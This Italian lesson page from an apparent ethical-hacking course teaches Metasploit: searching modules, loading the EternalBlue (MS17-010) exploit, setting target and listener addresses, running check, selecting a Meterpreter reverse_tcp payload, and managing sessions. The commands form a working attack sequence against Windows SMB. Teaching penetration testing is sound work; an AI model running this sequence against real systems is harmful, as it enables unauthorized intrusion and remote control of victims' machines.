Ricerca e uso degli exploit
Trovare ed eseguire
Ricerca e uso degli exploit è una lezione Ethical Hacking Academy gratuita su CoddyKit. Questa è la lezione 2 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Ethical Hacking Academy, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Ethical Hacking Academy include 4 lezioni in totale.
Dalla ricognizione all'exploit
Dopo la scansione, conosce i servizi e le versioni del bersaglio. Il passo successivo consiste nel trovare un modulo exploit che corrisponda a una vulnerabilità nota presente in quelle versioni.
Il comando search di Metasploit è il punto di accesso a migliaia di moduli. Cercare con precisione fa risparmiare tempo ed evita di eseguire il codice sbagliato.
Ricerca di base
Il comando search interroga l'indice dei moduli in base a una parola chiave. Può cercare per nome del software, CVE o servizio.
search eternalblue
search type:exploit platform:windows smbFiltri di ricerca
Raffini i risultati con i filtri:
- type: exploit, auxiliary, post.
- platform: windows, linux, unix.
- cve: un identificatore CVE specifico.
- rank: excellent, great, good (affidabilità).
Combinando i filtri, può ridurre rapidamente migliaia di moduli a pochi risultati.
search cve:2017-0144 type:exploitInterpretare i risultati della ricerca
I risultati della ricerca elencano ogni modulo con un rank, una data di divulgazione e un indicatore check. Il rank riflette l'affidabilità e la sicurezza dell'exploit.
- excellent: è improbabile che causi il crash del bersaglio.
- great/good: affidabile in condizioni comuni.
- low/manual: rischioso o che richiede una configurazione accurata.
Preferisca i moduli con rank più elevato per evitare di causare il crash dei sistemi di produzione.
Caricamento di un modulo
Usi il numero di indice del modulo o il percorso completo con use. Il prompt cambia per mostrare il modulo caricato e il datastore ora contiene le opzioni di quel modulo.
use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >Ispezione del modulo
Prima di eseguirlo, legga le informazioni sul modulo. info mostra la descrizione, i riferimenti (CVE, avvisi), le opzioni obbligatorie e i target supportati.
Capire cosa fa un modulo fa parte di un uso professionale e responsabile; non esegua mai un exploit che non comprende.
info
show options
show targetsConfigurazione delle opzioni
Configuri le opzioni obbligatorie con set. Per un exploit remoto, quelle più comuni sono l'indirizzo del target e le impostazioni del payload.
set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2Il comando check
Molti exploit supportano check, che verifica in sicurezza se il target sembra vulnerabile senza eseguire effettivamente l'exploit.
Eseguire prima check è una buona pratica: riduce il rischio di causare un arresto anomalo del sistema e conferma che state per dedicare tempo a un'opportunità reale.
check
# [+] 10.10.10.40:445 - The target is vulnerable.Scelta del payload
Un exploit richiede un payload. Metasploit ne seleziona uno predefinito, ma può elencare e scegliere quello più adatto al target e al livello di accesso necessario.
show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcpEsecuzione e sessioni
Avvii l'exploit con exploit (o run). In caso di successo, ottiene una session, ovvero una connessione interattiva al target.
Gestisca più sessioni con sessions -l per elencarle e sessions -i N per interagire. Metta una sessione in background con background per continuare a lavorare nella console.
exploit
sessions -l
sessions -i 1Opzioni globali e del modulo
Alcune impostazioni, come LHOST, vengono riutilizzate in molti moduli. Le imposti globalmente con setg, così non dovrà reinserirle ogni volta che cambia modulo.
set: si applica solo al modulo corrente.setg: si applica globalmente a tutti i moduli.unsetg: cancella un valore globale.
Questo fa risparmiare tempo durante le attività prolungate che coinvolgono molti moduli.
setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40Verifica rapida
Scelga il passaggio responsabile da eseguire prima di lanciare un exploit.
Riepilogo
Ha imparato a trovare ed eseguire gli exploit:
- Usi search con filtri (type, platform, cve, rank) per trovare i moduli.
- Preferisca i moduli con rank più elevato, per una maggiore affidabilità e sicurezza.
- Usi use per caricare, info/show options per ispezionare e set per configurare.
- Esegua prima check, quindi exploit per ottenere una session.
- Gestisca le sessioni con sessions -l/-i.
Prossimo argomento: i payload e la shell post-exploitation Meterpreter.
Domande Frequenti
La lezione «Ricerca e uso degli exploit» è gratuita?
Sì — il testo completo di «Ricerca e uso degli exploit» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Ethical Hacking Academy, passa a CoddyKit PRO. Il corso Ethical Hacking Academy include 4 lezioni in totale.
Cosa imparerò in «Ricerca e uso degli exploit»?
Trovare ed eseguire Eserciti Ethical Hacking Academy con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.
Ho bisogno di esperienza per iniziare Ethical Hacking Academy?
Non è richiesta alcuna esperienza precedente. Ethical Hacking Academy su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 2 di 4.
Quanto tempo richiede la lezione «Ricerca e uso degli exploit»?
La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.
Posso scrivere ed eseguire codice in questa lezione Ethical Hacking Academy?
Sì. Ogni lezione Ethical Hacking Academy include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.
Tutte le lezioni di questo corso
- Architettura di Metasploit
- Ricerca e uso degli exploit
- Payload e Meterpreter
- Moduli post-exploitation